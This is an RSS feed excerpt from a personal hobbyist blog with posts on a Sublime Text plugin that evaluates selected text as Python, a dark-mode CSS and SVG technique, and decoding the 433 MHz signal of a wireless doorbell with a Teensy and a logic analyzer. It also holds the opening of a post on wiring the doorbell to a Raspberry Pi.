<p>Sublime is the text editor that is almost always running on my machine. A long time ago, it was the only editor I wrote code in. Nowadays, it mostly holds <code>untitled</code> files with messy notes, code snippets, half-written messages, or anything else text-related.</p>
<p>I like to use it to transform text. For example, putting every line of a list between quotes, or sorting some lines alphabetically and concatenating them into a single comma-separated string, things like that. I even tend to copy text from my actual IDE, paste it into Sublime, transform it, and copy it back.</p>
<p>Of course, you could say that <a href="https://www.vim.org/">Vim</a> (or <a href="https://www.gnu.org/software/emacs/">Emacs</a>) can do such things faster and more efficiently, and is capable of many other things too. But for me, the mouse-driven multi-cursor workflow fits better than Vim-magic. I know, I'm a weirdo.</p>
<p>Sometimes I run into problems that cannot be easily solved by Sublime. Situations where a quiet voice in the back of your head tells you that you should write a small script or at least open the REPL of your favorite scripting language.</p>
<p><a id="cite_ref-1"></a>Let's look at a simple example. You want to generate the list of numbers from 1 to 10, every number in its own line. Of course, the local Vim-magician would tell you that it's just a quick <kbd>i</kbd> <kbd>1</kbd> <kbd>Esc</kbd> <kbd>q</kbd> <kbd>a</kbd> <kbd>Y</kbd> <kbd>p</kbd> <kbd>Ctrl</kbd>+<kbd>a</kbd> <kbd>q</kbd> <kbd>8</kbd> <kbd>@</kbd> <kbd>a</kbd> and you are done, but for me, this does not look like something that would come up in a real-world scenario.<a href="#cite_note-1" class="note"><sup>[1]</sup></a></p>
<p><a id="cite_ref-2"></a>Luckily, Sublime supports plugins, and even more luckily, they chose a proper scripting language for them. There is nothing worse than liking a program, wanting to create plugins for it, and finding out that you must use Perl.<a href="#cite_note-2" class="note"><sup>[2]</sup></a></p>
<h3>Running the selection</h3>
<p><a id="cite_ref-3"></a>My first idea was that I could create a command that runs the selected text as Python code and replaces it with the result:<a href="#cite_note-3" class="note"><sup>[3]</sup></a></p>
<pre class="file"><code>eval.py
</code></pre>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> sublime_plugin

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">EvalSelectionsCommand</span><span class="hljs-params">(sublime_plugin.TextCommand)</span>:</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span><span class="hljs-params">(self, edit)</span>:</span>
    <span class="hljs-keyword">for</span> region <span class="hljs-keyword">in</span> self.view.sel():
      <span class="hljs-keyword">if</span> region.empty():
        <span class="hljs-keyword">continue</span>

      code = self.view.substr(region)
      result = str(eval(code))
      self.view.replace(edit, region, result)
</code></pre>
<p>Interestingly enough, this was the first time I had to use <code>eval()</code> in Python. Soon enough, I also learned that we were all of us deceived, for another <code>eval()</code> was made... called <code>exec()</code>. Yes, my Precious, the first one just evaluates expressions. Only the second one can be used to execute any kind of Python code. Sneaky little hobbitses. But let's not go that far ahead. First, we need to somehow run this command.</p>
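<p>A minimal demonstration of the difference (plain Python, nothing Sublime-specific):</p>
<pre><code class="hljs python"># eval() evaluates a single expression and returns its value
value = eval('sum(range(1, 11))')
print(value)  # 55

# a statement, like a for loop, is a SyntaxError for eval()...
try:
    eval('for i in range(3): pass')
except SyntaxError as e:
    print('eval:', type(e).__name__)  # eval: SyntaxError

# ...but exec() runs it. exec() always returns None, so the result
# has to be read back from the namespace the code ran in
namespace = {}
exec('total = 0\nfor i in range(1, 11):\n    total += i', namespace)
print(namespace['total'])  # 55
</code></pre>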
<pre class="file"><code>eval.sublime-commands
</code></pre>
<pre><code class="hljs json">[
  { <span class="hljs-attr">"caption"</span>: <span class="hljs-string">"Run selection"</span>, <span class="hljs-attr">"command"</span>: <span class="hljs-string">"eval_selections"</span> }
]
</code></pre>
<p>Now we can select, for example, the <code>'\n'.join(map(str, range(1, 11)))</code> text, hit <kbd>Ctrl</kbd>+<kbd>Shift</kbd>+<kbd>p</kbd>, search for the command, and we are done. Somehow, it felt less comfortable than I had hoped, but considering how simple the code is, it's capable of many things.</p>
<h3>Transforming the selection</h3>
<p>Now, let's look at a different approach. What if the selection does not contain the code, but the code is working on the selections?</p>
<pre class="file"><code>eval.py
</code></pre>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> sublime_plugin

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">EvalSelectionsCommand</span><span class="hljs-params">(sublime_plugin.TextCommand)</span>:</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span><span class="hljs-params">(self, edit, text)</span>:</span>
    <span class="hljs-keyword">for</span> idx, region <span class="hljs-keyword">in</span> enumerate(self.view.sel()):
      data = self.view.substr(region)
      result = str(eval(text, {<span class="hljs-string">'d'</span>: data, <span class="hljs-string">'i'</span>: idx}, {}))
      self.view.replace(edit, region, result)

  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">input</span><span class="hljs-params">(self, args)</span>:</span>
    <span class="hljs-keyword">return</span> sublime_plugin.TextInputHandler()
</code></pre>
<p>The <code>eval()</code> got a little bit more complex. We pass it a couple of variables that we can use in our expression: <code>d</code> holds the text of the current selection and <code>i</code> its index. This way, we could have ten empty rows with an empty selection in each, run the command, and write <code>i+1</code> as the expression. Or, if the selections are not empty, we could write <code>f'{i+1}. {d}'</code> to prefix them with numbers.</p>
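<p>The expressions can also be tried outside of Sublime. A small sketch, where a list of strings stands in for the selections and the hypothetical <code>transform()</code> function passes the same <code>d</code> and <code>i</code> variables to <code>eval()</code>:</p>
<pre><code class="hljs python">def transform(selections, expression):
    # d is the selected text, i is the index of the selection
    return [
        str(eval(expression, {'d': data, 'i': idx}, {}))
        for idx, data in enumerate(selections)
    ]


print(transform(['', '', ''], 'i+1'))  # ['1', '2', '3']
print(transform(['apple', 'pear'], "f'{i+1}. {d}'"))  # ['1. apple', '2. pear']
</code></pre>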

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/transform-selection.png" width="660" height="300" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">A later iteration of this idea. The <code>d</code> variable name was changed to <code>_</code>, with a preview based on the first selection.</p>

<h3>More clever execution</h3>
<p>We can now jump back to the <code>exec()</code>. If we have the following small code snippet selected and try to run it...</p>
<pre><code class="hljs python"><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">10</span>):
  print(i+<span class="hljs-number">1</span>)
</code></pre>
<p>...our first implementation would throw a <code>SyntaxError: invalid syntax</code> exception. So we need to make it a little smarter:</p>
<pre class="file"><code>eval.py
</code></pre>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> sublime_plugin
<span class="hljs-keyword">import</span> traceback

<span class="hljs-keyword">from</span> io <span class="hljs-keyword">import</span> StringIO
<span class="hljs-keyword">from</span> contextlib <span class="hljs-keyword">import</span> redirect_stdout

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">EvalSelectionsCommand</span><span class="hljs-params">(sublime_plugin.TextCommand)</span>:</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span><span class="hljs-params">(self, edit)</span>:</span>
    <span class="hljs-keyword">for</span> region <span class="hljs-keyword">in</span> self.view.sel():
      <span class="hljs-keyword">if</span> region.empty():
        <span class="hljs-keyword">continue</span>

      code = self.view.substr(region)
      self.view.replace(edit, region, self.__run_code(code))

  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__run_code</span><span class="hljs-params">(self, code)</span>:</span>
    <span class="hljs-keyword">try</span>:
      <span class="hljs-keyword">return</span> str(eval(code))
    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:
      <span class="hljs-keyword">try</span>:
        <span class="hljs-keyword">return</span> self.__exec_code(code)
      <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:
        <span class="hljs-keyword">return</span> <span class="hljs-string">''</span>.join(traceback.format_exception(type(e), e, e.__traceback__))

  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__exec_code</span><span class="hljs-params">(self, code)</span>:</span>
    f = StringIO()
    <span class="hljs-keyword">with</span> redirect_stdout(f):
      exec(code)
    <span class="hljs-keyword">return</span> f.getvalue()
</code></pre>
<p>We try to run the code with <code>eval()</code> first, and if that fails, we fall back to <code>exec()</code>. The tricky part is the output: <code>exec()</code> doesn't return anything, and if we didn't redirect the standard output, whatever the code prints would end up in Sublime's console instead of replacing our selection.</p>
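<p>Outside of Sublime, the same eval-then-exec idea can be sketched as a plain function. In this variant (my assumption, not the plugin's code), the fallback only happens on a <code>SyntaxError</code>, so an expression that raises an error at runtime is not executed a second time by <code>exec()</code>; <code>run_code</code> is a hypothetical name.</p>
<pre><code class="hljs python">import traceback
from contextlib import redirect_stdout
from io import StringIO


def run_code(code):
    try:
        try:
            # a single expression: return its value
            return str(eval(code))
        except SyntaxError:
            # statements (like a for loop): run them, capturing print()
            output = StringIO()
            with redirect_stdout(output):
                exec(code, {})
            return output.getvalue()
    except Exception as e:
        # any error is returned as text instead of being raised
        return ''.join(traceback.format_exception(type(e), e, e.__traceback__))


print(run_code('1 + 2'))  # 3
</code></pre>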
<p>As an added bonus, we also have better error handling in this one, so we don't have to check the console if something is wrong with the code we want to run. The code will be replaced with the error, but we can quickly get it back with <kbd>Ctrl</kbd>+<kbd>z</kbd>, of course.</p>
<h3>A wealth of possibilities</h3>
<p>There are many ways we could improve this little plugin-wannabe. Just a couple of ideas:</p>
<ul>
<li>the two mentioned approaches could be two different commands, different tools for different problems</li>
<li>we can add aliases, shortcuts, and helper functions for frequently used functionality to the namespace of <code>eval()</code> or <code>exec()</code>, so we can use them in our code snippets</li>
<li>output could be displayed in a separate window</li>
</ul>
<p>But our broadcast time is coming to an end, so I have no choice but to leave the further investigation of the topic as an exercise for the reader.</p>
<hr />
<h3>Notes</h3>
<p><a id="cite_note-1"></a>1. <a href="#cite_ref-1" class="note">↑</a> There are more straightforward, shorter solutions, but this one felt the most Vim-like for me. More details <a href="https://vi.stackexchange.com/questions/12/how-can-i-generate-a-list-of-sequential-numbers-one-per-line">here</a>.</p>
<p><a id="cite_note-2"></a>2. <a href="#cite_ref-2" class="note">↑</a> Just a childhood trauma, don't worry about it. A long, long time ago, I really liked the <a href="https://irssi.org/">Irssi IRC client</a>, but my brain couldn't handle Perl, so I wasn't able to write scripts for it.</p>
<p><a id="cite_note-3"></a>3. <a href="#cite_ref-3" class="note">↑</a> Naturally, there are <a href="https://packagecontrol.io/search/eval">existing plugins for this</a>, but where is the fun in that?</p>

]]></content:encoded>
        </item>
            <item>
            <title>Don&#039;t underestimate the power of the Dark Site</title>
            <link>https://deadlime.hu/en/2021/09/27/dont-underestimate-the-power-of-the-dark-site/</link>
            <pubDate>Sun, 26 Sep 2021 22:33:41 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[CSS]]></category>
                    <category><![CDATA[siteinfo]]></category>
                    
            <guid isPermaLink="false">9ab817c3217757615fdda553344122d3</guid>
            <description>For all the dark mode fans: the site now has dark color scheme support</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/night-sky.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>You may run into dark mode in more and more places nowadays, like operating systems or even browsers. This inspired me to create a dark variant of the site too.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/modes.jpg" width="660" height="300" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">The two color schemes next to each other</p>

<p>The development part was surprisingly easy. I only needed to add a media query and fill it with rules.</p>
<pre><code class="hljs css"><span class="hljs-keyword">@media</span> (<span class="hljs-attribute">prefers-color-scheme:</span> dark) {
}
</code></pre>
<p>For the sake of simplicity, I just copied the original CSS into this block, removed everything not color-related, and adjusted the values in the rest. After that, the only remaining thing to fix was the images. So I made a dark variant of the header image, and for the SVG images, I used the following trick:</p>
<pre class="file"><code>image.svg
</code></pre>
<pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">svg</span> <span class="hljs-attr">xmlns</span>=<span class="hljs-string">"http://www.w3.org/2000/svg"</span> <span class="hljs-attr">version</span>=<span class="hljs-string">"1.1"</span>&gt;</span>
  <span class="hljs-tag">&lt;<span class="hljs-name">style</span> <span class="hljs-attr">type</span>=<span class="hljs-string">"text/css"</span>&gt;</span><span class="xml">&lt;![CDATA[
    .shape { display: none; }
    .shape:target { display: inline; }
  ]]&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">style</span>&gt;</span>
  <span class="hljs-tag">&lt;<span class="hljs-name">g</span> <span class="hljs-attr">class</span>=<span class="hljs-string">"shape"</span> <span class="hljs-attr">id</span>=<span class="hljs-string">"light"</span>&gt;</span>
    <span class="hljs-comment">&lt;!-- source of the original image --&gt;</span>
  <span class="hljs-tag">&lt;/<span class="hljs-name">g</span>&gt;</span>
  <span class="hljs-tag">&lt;<span class="hljs-name">g</span> <span class="hljs-attr">class</span>=<span class="hljs-string">"shape"</span> <span class="hljs-attr">id</span>=<span class="hljs-string">"dark"</span>&gt;</span>
    <span class="hljs-comment">&lt;!-- source of the modified dark image --&gt;</span>
  <span class="hljs-tag">&lt;/<span class="hljs-name">g</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">svg</span>&gt;</span>
</code></pre>
<p>This can be referenced in CSS in the following way:</p>
<pre><code class="hljs css"><span class="hljs-selector-id">#something</span> {
  <span class="hljs-attribute">background-image</span>: <span class="hljs-built_in">url</span>(<span class="hljs-string">'image.svg#light'</span>);
}
<span class="hljs-keyword">@media</span> (<span class="hljs-attribute">prefers-color-scheme:</span> dark) {
  <span class="hljs-selector-id">#something</span> {
    <span class="hljs-attribute">background-image</span>: <span class="hljs-built_in">url</span>(<span class="hljs-string">'image.svg#dark'</span>);
  }
}
</code></pre>
<p>It was pretty fun, so I highly recommend it to anyone as a light evening pastime.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Surfing on radio waves</title>
            <link>https://deadlime.hu/en/2021/01/25/surfing-on-radio-waves/</link>
            <pubDate>Mon, 25 Jan 2021 11:00:00 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Arduino]]></category>
                    <category><![CDATA[Teensy]]></category>
                    <category><![CDATA[hardware]]></category>
                    
            <guid isPermaLink="false">3fff7c84c652d0272c18bb3c23afd3c7</guid>
            <description>Our next journey with the doorbell takes us to the wonderful world of radio signals</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/telescope.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>In the <a href="https://deadlime.hu/en/2020/12/07/ring-up-the-internet/">last post</a>, I mentioned that you don't necessarily have to disassemble your indoor unit and solder into it: you can also build your own radio receiver. Today we will explore this option a bit more.</p>
<p>This approach is so far removed from hardware hacking that we don't even need to take the device apart. The product's technical specification contains all the information we need, such as the fact that it transmits on 433.9 MHz. You can buy a <a href="https://www.aliexpress.com/wholesale?SearchText=433mhz+receiver">433.9 MHz receiver</a> from your favorite Chinese webshop. I chose <a href="https://www.aliexpress.com/item/32737335032.html">this model</a> without any serious research, but luckily it worked well.</p>
<p>And now we wait a month or so for the package to arrive. In the meantime, we can <a href="https://deadlime.hu/en/2020/12/07/ring-up-the-internet/">take the doorbell apart and wire it up with a Raspberry Pi</a>. :)</p>
<p>When the package arrived, we opened it with great excitement, only to find that the antennas were not soldered onto the modules, so out came the soldering iron. Then I connected an LED to the data output of the receiver to see whether anything would happen when I pushed the doorbell button.</p>

<video controls width="660" height="450">
    <source src="https://deadlime.hu/uploads/2021/led.mp4" type="video/mp4" />
</video>

<p>Notice in the video that the LED blinks randomly at first, then settles into a faint, more orderly flickering, followed by a longer off state and a longer on state, before going back to random blinking. So the signal sent by the outdoor unit is probably the orderly flickering together with the longer off/on states. The rest is noise, which is a bit concerning: there will be a lot of garbage we have to ignore.</p>
<h3>More detailed analysis</h3>
<p>It would be nice to see more precisely what's going on, so let's hook up a logic analyzer to the data output and see whether it reveals anything useful. Luckily, there are cheap Chinese models we can order (I went with <a href="https://www.aliexpress.com/item/32850407090.html">this one</a>, but there are <a href="https://www.aliexpress.com/wholesale?SearchText=USB+Logic+Analyzer">plenty to choose from</a>). Another month of waiting, and we can continue with the project.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/logic_analyzer.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>On my computer, I used <a href="https://sigrok.org/wiki/PulseView">PulseView</a> to display the incoming data. Below you can see the signal for a doorbell button press.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/pulseview_1.png" width="660" height="60" alt="" title="" loading="lazy" />
</p>

<p>It correlates nicely with what we saw on the LED: the random parts are at the beginning and the end, and the more orderly part is in the middle, closed by the long off/on state. Let's zoom into the orderly part:</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/pulseview_2.png" width="660" height="60" alt="" title="" loading="lazy" />
</p>

<p>This is where the signal goes from random to less random. It looks like the transmitter repeats the same pattern around a hundred times, with short pauses in between.</p>
<p>Zooming in a little more, we can identify two distinct pulse shapes inside this repeating pattern. In the first, a longer high state is followed by a shorter low state; let's call this a binary one. In the second, a shorter high state is followed by a longer low state, which will be a binary zero.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/pulseview_3.png" width="660" height="120" alt="" title="" loading="lazy" />
</p>

<p>We can't be sure what these 17 bits mean. Maybe it's an identifier for the receiver. Maybe the 17th bit is not part of the data at all, but belongs to the separator between data packets. In that case, we have 16 bits, which sounds a lot better. The good news is that we don't really care what the data means: it's the same for every button press, so for our project we just need to match this otherwise meaningless pattern.</p>
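<p>The decoding idea described above can be sketched in a few lines of Python. This is my own illustration, not code from the project. Each pulse is represented as a hypothetical <code>(high, low)</code> pair of durations in microseconds. A pulse counts as a binary one if its high state is longer than its low state. Only the first 16 bits of a frame are kept, on the assumption that the 17th belongs to the separator.</p>
<pre><code class="hljs python">def pulse_to_bit(high, low):
    """Classify one (high, low) pulse: a long high followed by a short low is a 1."""
    return 1 if high > low else 0


def frame_to_int(pulses, bits=16):
    """Pack the first `bits` pulses of a frame into an integer, most significant bit first.

    Any further pulses (e.g. a 17th one that may belong to the separator) are ignored.
    """
    value = 0
    for high, low in pulses[:bits]:
        value = value * 2 + pulse_to_bit(high, low)
    return value


# Hypothetical frame: three "long high" pulses followed by one "short high" pulse
example = [(600, 150), (600, 150), (600, 150), (250, 530)]
print(frame_to_int(example, bits=4))  # 14, i.e. 0b1110
</code></pre>
<p>Comparing the two durations against each other is more forgiving than fixed time windows. However, it also turns any noise pulse into a bit, so on its own it won't get rid of the garbage we saw earlier.</p>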
<h3>The device</h3>
<p>I first tried to use an Arduino Uno as the indoor receiver, but I couldn't get it to read the same pattern the logic analyzer had shown. Maybe the hardware is too slow for such a dense signal, or maybe I messed something up. Either way, I switched to a Teensy 3.1, and things got a lot better.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/teensy.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Fortunately, my Arduino code needed only minor changes to run on the new hardware. First, I wrote a program that prints to the serial console how long the signal stays in the high and low states.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span> high_value = <span class="hljs-number">0</span>;
<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span> low_value = <span class="hljs-number">0</span>;
<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span> prev_time = <span class="hljs-number">0</span>;

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">setup</span><span class="hljs-params">()</span> </span>{
  <span class="hljs-built_in">Serial</span>.<span class="hljs-built_in">begin</span>(<span class="hljs-number">9600</span>);

  <span class="hljs-built_in">attachInterrupt</span>(<span class="hljs-number">23</span>, rising, RISING);
}

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">loop</span><span class="hljs-params">()</span> </span>{}

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">rising</span><span class="hljs-params">()</span> </span>{
  <span class="hljs-comment">// End of a low state: read the clock once so both lines use the same timestamp</span>
  <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span> now = <span class="hljs-built_in">micros</span>();
  low_value = now - prev_time;
  prev_time = now;

  <span class="hljs-built_in">Serial</span>.<span class="hljs-built_in">print</span>(<span class="hljs-string">"H"</span>);
  <span class="hljs-built_in">Serial</span>.<span class="hljs-built_in">print</span>(high_value);
  <span class="hljs-built_in">Serial</span>.<span class="hljs-built_in">print</span>(<span class="hljs-string">", L"</span>);
  <span class="hljs-built_in">Serial</span>.<span class="hljs-built_in">println</span>(low_value);

  <span class="hljs-comment">// Next, wait for the end of the high state</span>
  <span class="hljs-built_in">attachInterrupt</span>(<span class="hljs-number">23</span>, falling, FALLING);
}

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">falling</span><span class="hljs-params">()</span> </span>{
  <span class="hljs-comment">// End of a high state</span>
  <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span> now = <span class="hljs-built_in">micros</span>();
  high_value = now - prev_time;
  prev_time = now;

  <span class="hljs-comment">// Next, wait for the end of the low state</span>
  <span class="hljs-built_in">attachInterrupt</span>(<span class="hljs-number">23</span>, rising, RISING);
}
</code></pre>
<p>It was pretty easy to spot the repeating pattern:</p>
<pre class="console"><code>H631, L140
H632, L142
H630, L144
H242, L533
H626, L145
H629, L146
H239, L536
H239, L532
H627, L143
H627, L146
H239, L536
H238, L535
H240, L532
H627, L143
H241, L534
H241, L534
H626, L1683
</code></pre>
<p>There is some variance, but we can see the patterns for the binary ones and zeroes, and the bigger pause after the last bit. Next, we need to replace the printing with detection of the ringing signal, and we are done:</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">const</span> <span class="hljs-keyword">unsigned</span> short target = <span class="hljs-number">60612</span>;
<span class="hljs-keyword">unsigned</span> short value = <span class="hljs-number">0</span>;

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">rising</span><span class="hljs-params">()</span> </span>{
  <span class="hljs-comment">// [...]</span>

  <span class="hljs-keyword">if</span> (high_value &gt;= <span class="hljs-number">620</span> &amp;&amp; high_value &lt;= <span class="hljs-number">640</span> &amp;&amp; low_value &gt;= <span class="hljs-number">130</span> &amp;&amp; low_value &lt;= <span class="hljs-number">150</span>) {
    <span class="hljs-comment">// Long high, short low: shift in a binary one</span>
    value = (value &lt;&lt; <span class="hljs-number">1</span>) + <span class="hljs-number">1</span>;
  }
  <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (high_value &gt;= <span class="hljs-number">230</span> &amp;&amp; high_value &lt;= <span class="hljs-number">250</span> &amp;&amp; low_value &gt;= <span class="hljs-number">520</span> &amp;&amp; low_value &lt;= <span class="hljs-number">550</span>) {
    <span class="hljs-comment">// Short high, long low: shift in a binary zero</span>
    value = value &lt;&lt; <span class="hljs-number">1</span>;
  }
  <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (low_value &gt; <span class="hljs-number">1500</span>) {
    <span class="hljs-comment">// Long pause after the 17th pulse: start a new frame</span>
    value = <span class="hljs-number">0</span>;
  }

  <span class="hljs-keyword">if</span> (value == target) {
    <span class="hljs-built_in">Serial</span>.<span class="hljs-built_in">println</span>(<span class="hljs-string">"Ding-dong"</span>);
  }

  <span class="hljs-comment">// [...]</span>
}
</code></pre>
<p>This works, but it cuts a few corners. For example, it doesn't read the 17th bit (we don't know whether it's part of the data). Instead, it uses the longer pause after that bit to reset the current value. That's actually for the best, because 17 bits wouldn't fit in a <code>short</code>.</p>
<p>Another issue is that the pattern repeats, so we get multiple &quot;Ding-dong&quot; messages per ring, though fewer than we would get if every repetition were matched successfully. We could widen the limits a little to allow for more variance, or somehow detect the bigger gap between the patterns, but I'll leave this as an exercise for the reader.</p>
<p>If you still aren't fed up with radio signals after this, building a custom transmitter could be an interesting next project. For example, you could make your own doorbell button for your indoor unit, or a universal button that sends every possible pattern and rings all the indoor units. :)</p>
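<p>Where does the <code>target</code> value come from? The sketch below is my own reconstruction, not part of the original project. It parses the log printed earlier and replays the same limits as the <code>rising()</code> handler. It emulates the 16-bit <code>unsigned short</code> by keeping the value modulo 65536. The 16 pulses before the long pause decode to <code>1110110011000100</code>, which is <code>0xECC4</code>, or 60612.</p>
<pre><code class="hljs python">import re

# The log printed by the measuring sketch (high and low durations in microseconds)
LOG = """
H631, L140
H632, L142
H630, L144
H242, L533
H626, L145
H629, L146
H239, L536
H239, L532
H627, L143
H627, L146
H239, L536
H238, L535
H240, L532
H627, L143
H241, L534
H241, L534
H626, L1683
"""

LINE_RE = re.compile(r"H(\d+), L(\d+)")


def parse_log(text):
    """Turn lines like 'H631, L140' into (high, low) tuples."""
    return [tuple(map(int, m.groups())) for m in LINE_RE.finditer(text)]


def decode(pulses):
    """Replay the window checks of rising() and return the value after each pulse."""
    value = 0
    seen = []
    for high, low in pulses:
        if high in range(620, 641) and low in range(130, 151):
            value = (value * 2 + 1) % 0x10000  # binary one, kept to 16 bits
        elif high in range(230, 251) and low in range(520, 551):
            value = (value * 2) % 0x10000      # binary zero, kept to 16 bits
        elif low > 1500:
            value = 0                          # long pause: start a new frame
        seen.append(value)
    return seen


values = decode(parse_log(LOG))
print(values[-2], hex(values[-2]), format(values[-2], "016b"))
# 60612 0xecc4 1110110011000100
</code></pre>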
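<p>Here is one possible way to get a single message per ring, sketched in Python for readability rather than as Teensy code. The idea is to remember when the last match happened and to report a match as a new ring only if it arrives after a quiet period. <code>RingDetector</code> and its 3-second default are hypothetical choices of mine, not measured values. A Teensy port would feed it <code>micros()</code> timestamps.</p>
<pre><code class="hljs python">class RingDetector:
    """Turn repeated frame matches into one event per ring (hypothetical helper)."""

    def __init__(self, quiet_period_us=3_000_000):
        # How long the matches must stop before the next match counts as a new ring
        self.quiet_period_us = quiet_period_us
        self.last_match_us = None

    def on_match(self, now_us):
        """Call whenever the decoded value equals the target; True means a new ring."""
        is_new_ring = (
            self.last_match_us is None
            or now_us - self.last_match_us >= self.quiet_period_us
        )
        # Update on every match, so a long burst of repetitions stays one ring
        self.last_match_us = now_us
        return is_new_ring


detector = RingDetector()
# Matches 15 ms apart belong to the same ring; the one 10 s later is a new ring
print([detector.on_match(t) for t in (0, 15_000, 30_000, 10_000_000)])
# [True, False, False, True]
</code></pre>
<p>This is similar in spirit to the long <code>bouncetime</code> in the Raspberry Pi version of the project. The difference is that the window restarts with every match instead of being a fixed length.</p>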
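<p>As a starting point for the transmitter side, here is a sketch that turns a 16-bit code back into pulse timings. The durations are rounded from the log above and have not been tested with an actual transmitter. Treating the 17th pulse as a fixed end marker is also an assumption, since we don't know whether it carries data.</p>
<pre><code class="hljs python"># Approximate pulse timings in microseconds, rounded from the measured log (assumptions)
ONE = (630, 145)         # long high, short low
ZERO = (240, 535)        # short high, long low
FRAME_END = (630, 1680)  # the 17th pulse, followed by the long pause


def encode_frame(code, bits=16):
    """Turn a code into the (high, low) pulses of one frame, most significant bit first."""
    pulses = [ONE if (code >> i) % 2 else ZERO for i in reversed(range(bits))]
    # Treat the 17th pulse as a fixed end marker (we don't know whether it carries data)
    pulses.append(FRAME_END)
    return pulses


def frame_duration_us(pulses):
    """Total length of a frame in microseconds, including the final pause."""
    return sum(high + low for high, low in pulses)


frame = encode_frame(60612)
print(len(frame), frame_duration_us(frame))  # 17 14710
</code></pre>
<p>At roughly 14.7 ms per frame, a universal button that sends each of the 65536 possible 16-bit codes once would need about 65536 × 14.71 ms ≈ 964 seconds, a bit over 16 minutes. That estimate also assumes a single frame is enough to trigger a receiver.</p>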

]]></content:encoded>
        </item>
            <item>
            <title>Ring up the Internet</title>
            <link>https://deadlime.hu/en/2020/12/07/ring-up-the-internet/</link>
            <pubDate>Mon, 07 Dec 2020 19:57:03 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Raspberry Pi]]></category>
                    <category><![CDATA[Python]]></category>
                    <category><![CDATA[hardware]]></category>
                    
            <guid isPermaLink="false">d2efb5e180fc6c242594def929b04d3f</guid>
            <description>Making a wireless doorbell Internet-ready with some hardware upgrades</description>
            <content:encoded><![CDATA[<p>It's amazing what technology is capable of nowadays. For example, there are battery-powered buttons (interestingly enough, not necessarily powered by a button cell) that make a doorbell ring when someone presses them at the door. It's magic. But what if you don't want to hear <em>Für Elise</em> (or one of the other 35 classic melodies the device offers) for the thousandth time? What if you want to receive a push notification on your phone instead?</p>
<p>Of course, there are commercially available devices that can do that, but we could take a different path and try to make our current doorbell smarter. I hope I don't have to stress that you do everything at your own risk. Below, you can read about my experience.</p>
<h3>Ring me up</h3>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2020/12/doorbell.jpg" width="600" height="360" alt="" title="" loading="lazy" />
</p>

<p>My doorbell is similar to the one in the image above. On the left is the outdoor unit, a battery-powered button. On the right are the indoor units, which plug into a wall socket. I started the project by taking a closer look at the latter.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2020/12/pcb.jpg" width="660" height="480" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">A later stage of the visual inspection</p>

<p>The two bigger holes in the center are where the two pins of the wall plug were attached. I had to desolder them to separate the casing from the PCB. It's even better this way: after my tinkering, I wouldn't want to plug it back into the wall anyway. So the first item on the agenda is to find out what voltage the components need and how to supply it.</p>
<h3>The voltage is dropping</h3>
